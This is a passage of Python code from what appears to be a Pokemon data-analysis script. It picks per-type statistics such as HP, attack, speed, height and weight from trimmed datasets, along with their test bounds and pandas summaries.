stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.total_points
stat_stats = loaddata.total_points_stats
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.hp
stat_stats = loaddata.hp_stats
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.speed
stat_stats = loaddata.speed_stats
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.attack
stat_stats = loaddata.attack_stats
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.defense
stat_stats = loaddata.defense_stats
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.sp_attack
stat_stats = loaddata.sp_attack_stats
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.sp_defense
stat_stats = loaddata.sp_defense_stats
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.heights
stat_stats = loaddata.height_stats
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.weight
stat_stats = loaddata.weight_stats
unit = '(kg)'
else:
return
else:
return
elif data_set == "2": # trimmed pokemon
set_name = "Pokemon"
modifier = '(trimmed)'
# grass pokemon
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_grass_types['total_points']
stat_stats = loaddata.trimmed_grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['hp']
stat_stats = loaddata.trimmed_grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['speed']
stat_stats = loaddata.trimmed_grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['attack']
stat_stats = loaddata.trimmed_grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['defense']
stat_stats = loaddata.trimmed_grass_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['sp_attack']
stat_stats = loaddata.trimmed_grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_grass_types['sp_defense']
stat_stats = loaddata.trimmed_grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_grass_types['height_m']
stat_stats = loaddata.trimmed_grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_grass_types['weight_kg']
stat_stats = loaddata.trimmed_grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_fire_types['total_points']
stat_stats = loaddata.trimmed_fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['hp']
stat_stats = loaddata.trimmed_fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['speed']
stat_stats = loaddata.trimmed_fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['attack']
stat_stats = loaddata.trimmed_fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['defense']
stat_stats = loaddata.trimmed_fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['sp_attack']
stat_stats = loaddata.trimmed_fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fire_types['sp_defense']
stat_stats = loaddata.trimmed_fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_fire_types['height_m']
stat_stats = loaddata.trimmed_fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_fire_types['weight_kg']
stat_stats = loaddata.trimmed_fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_water_types['total_points']
stat_stats = loaddata.trimmed_water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['hp']
stat_stats = loaddata.trimmed_water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['speed']
stat_stats = loaddata.trimmed_water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['attack']
stat_stats = loaddata.trimmed_water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['defense']
stat_stats = loaddata.trimmed_water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['sp_attack']
stat_stats = loaddata.trimmed_water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_water_types['sp_defense']
stat_stats = loaddata.trimmed_water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_water_types['height_m']
stat_stats = loaddata.trimmed_water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_water_types['weight_kg']
stat_stats = loaddata.trimmed_water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_electric_types['total_points']
stat_stats = loaddata.trimmed_electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['hp']
stat_stats = loaddata.trimmed_electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['speed']
stat_stats = loaddata.trimmed_electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['attack']
stat_stats = loaddata.trimmed_electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['defense']
stat_stats = loaddata.trimmed_electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['sp_attack']
stat_stats = loaddata.trimmed_electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_electric_types['sp_defense']
stat_stats = loaddata.trimmed_electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_electric_types['height_m']
stat_stats = loaddata.trimmed_electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_electric_types['weight_kg']
stat_stats = loaddata.trimmed_electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_psychic_types['total_points']
stat_stats = loaddata.trimmed_psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['hp']
stat_stats = loaddata.trimmed_psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['speed']
stat_stats = loaddata.trimmed_psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['attack']
stat_stats = loaddata.trimmed_psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['defense']
stat_stats = loaddata.trimmed_psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['sp_attack']
stat_stats = loaddata.trimmed_psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_psychic_types['sp_defense']
stat_stats = loaddata.trimmed_psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_psychic_types['height_m']
stat_stats = loaddata.trimmed_psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_psychic_types['weight_kg']
stat_stats = loaddata.trimmed_psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_ice_types['total_points']
stat_stats = loaddata.trimmed_ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['hp']
stat_stats = loaddata.trimmed_ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['speed']
stat_stats = loaddata.trimmed_ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['attack']
stat_stats = loaddata.trimmed_ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['defense']
stat_stats = loaddata.trimmed_ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['sp_attack']
stat_stats = loaddata.trimmed_ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ice_types['sp_defense']
stat_stats = loaddata.trimmed_ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_ice_types['height_m']
stat_stats = loaddata.trimmed_ice_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_ice_types['weight_kg']
stat_stats = loaddata.trimmed_ice_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dragon pokemon
elif type_set == "7":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_dragon_types['total_points']
stat_stats = loaddata.trimmed_dragon_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['hp']
stat_stats = loaddata.trimmed_dragon_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['speed']
stat_stats = loaddata.trimmed_dragon_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['attack']
stat_stats = loaddata.trimmed_dragon_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['defense']
stat_stats = loaddata.trimmed_dragon_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['sp_attack']
stat_stats = loaddata.trimmed_dragon_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dragon_types['sp_defense']
stat_stats = loaddata.trimmed_dragon_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_dragon_types['height_m']
stat_stats = loaddata.trimmed_dragon_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_dragon_types['weight_kg']
stat_stats = loaddata.trimmed_dragon_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dark pokemon
elif type_set == "8":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_dark_types['total_points']
stat_stats = loaddata.trimmed_dark_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['hp']
stat_stats = loaddata.trimmed_dark_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['speed']
stat_stats = loaddata.trimmed_dark_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['attack']
stat_stats = loaddata.trimmed_dark_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['defense']
stat_stats = loaddata.trimmed_dark_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['sp_attack']
stat_stats = loaddata.trimmed_dark_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_dark_types['sp_defense']
stat_stats = loaddata.trimmed_dark_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_dark_types['height_m']
stat_stats = loaddata.trimmed_dark_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_dark_types['weight_kg']
stat_stats = loaddata.trimmed_dark_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fairy pokemon
elif type_set == "9":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_fairy_types['total_points']
stat_stats = loaddata.trimmed_fairy_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['hp']
stat_stats = loaddata.trimmed_fairy_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['speed']
stat_stats = loaddata.trimmed_fairy_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['attack']
stat_stats = loaddata.trimmed_fairy_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['defense']
stat_stats = loaddata.trimmed_fairy_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['sp_attack']
stat_stats = loaddata.trimmed_fairy_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fairy_types['sp_defense']
stat_stats = loaddata.trimmed_fairy_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_fairy_types['height_m']
stat_stats = loaddata.trimmed_fairy_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_fairy_types['weight_kg']
stat_stats = loaddata.trimmed_fairy_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# normal pokemon
elif type_set == "10":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_normal_types['total_points']
stat_stats = loaddata.trimmed_normal_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['hp']
stat_stats = loaddata.trimmed_normal_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['speed']
stat_stats = loaddata.trimmed_normal_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['attack']
stat_stats = loaddata.trimmed_normal_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['defense']
stat_stats = loaddata.trimmed_normal_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['sp_attack']
stat_stats = loaddata.trimmed_normal_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_normal_types['sp_defense']
stat_stats = loaddata.trimmed_normal_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_normal_types['height_m']
stat_stats = loaddata.trimmed_normal_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_normal_types['weight_kg']
stat_stats = loaddata.trimmed_normal_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fighting pokemon
elif type_set == "11":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_fighting_types['total_points']
stat_stats = loaddata.trimmed_fighting_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['hp']
stat_stats = loaddata.trimmed_fighting_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['speed']
stat_stats = loaddata.trimmed_fighting_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['attack']
stat_stats = loaddata.trimmed_fighting_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['defense']
stat_stats = loaddata.trimmed_fighting_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['sp_attack']
stat_stats = loaddata.trimmed_fighting_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_fighting_types['sp_defense']
stat_stats = loaddata.trimmed_fighting_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_fighting_types['height_m']
stat_stats = loaddata.trimmed_fighting_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_fighting_types['weight_kg']
stat_stats = loaddata.trimmed_fighting_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# flying pokemon
elif type_set == "12":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_flying_types['total_points']
stat_stats = loaddata.trimmed_flying_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['hp']
stat_stats = loaddata.trimmed_flying_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['speed']
stat_stats = loaddata.trimmed_flying_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['attack']
stat_stats = loaddata.trimmed_flying_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['defense']
stat_stats = loaddata.trimmed_flying_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['sp_attack']
stat_stats = loaddata.trimmed_flying_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_flying_types['sp_defense']
stat_stats = loaddata.trimmed_flying_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_flying_types['height_m']
stat_stats = loaddata.trimmed_flying_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_flying_types['weight_kg']
stat_stats = loaddata.trimmed_flying_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# poison pokemon
elif type_set == "13":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_poison_types['total_points']
stat_stats = loaddata.trimmed_poison_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['hp']
stat_stats = loaddata.trimmed_poison_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['speed']
stat_stats = loaddata.trimmed_poison_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['attack']
stat_stats = loaddata.trimmed_poison_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['defense']
stat_stats = loaddata.trimmed_poison_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['sp_attack']
stat_stats = loaddata.trimmed_poison_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_poison_types['sp_defense']
stat_stats = loaddata.trimmed_poison_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_poison_types['height_m']
stat_stats = loaddata.trimmed_poison_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_poison_types['weight_kg']
stat_stats = loaddata.trimmed_poison_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ground pokemon
elif type_set == "14":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_ground_types['total_points']
stat_stats = loaddata.trimmed_ground_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['hp']
stat_stats = loaddata.trimmed_ground_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['speed']
stat_stats = loaddata.trimmed_ground_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['attack']
stat_stats = loaddata.trimmed_ground_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['defense']
stat_stats = loaddata.trimmed_ground_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['sp_attack']
stat_stats = loaddata.trimmed_ground_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ground_types['sp_defense']
stat_stats = loaddata.trimmed_ground_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_ground_types['height_m']
stat_stats = loaddata.trimmed_ground_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_ground_types['weight_kg']
stat_stats = loaddata.trimmed_ground_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# rock pokemon
elif type_set == "15":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_rock_types['total_points']
stat_stats = loaddata.trimmed_rock_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['hp']
stat_stats = loaddata.trimmed_rock_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['speed']
stat_stats = loaddata.trimmed_rock_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['attack']
stat_stats = loaddata.trimmed_rock_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['defense']
stat_stats = loaddata.trimmed_rock_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['sp_attack']
stat_stats = loaddata.trimmed_rock_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_rock_types['sp_defense']
stat_stats = loaddata.trimmed_rock_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_rock_types['height_m']
stat_stats = loaddata.trimmed_rock_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_rock_types['weight_kg']
stat_stats = loaddata.trimmed_rock_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# bug pokemon
elif type_set == "16":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
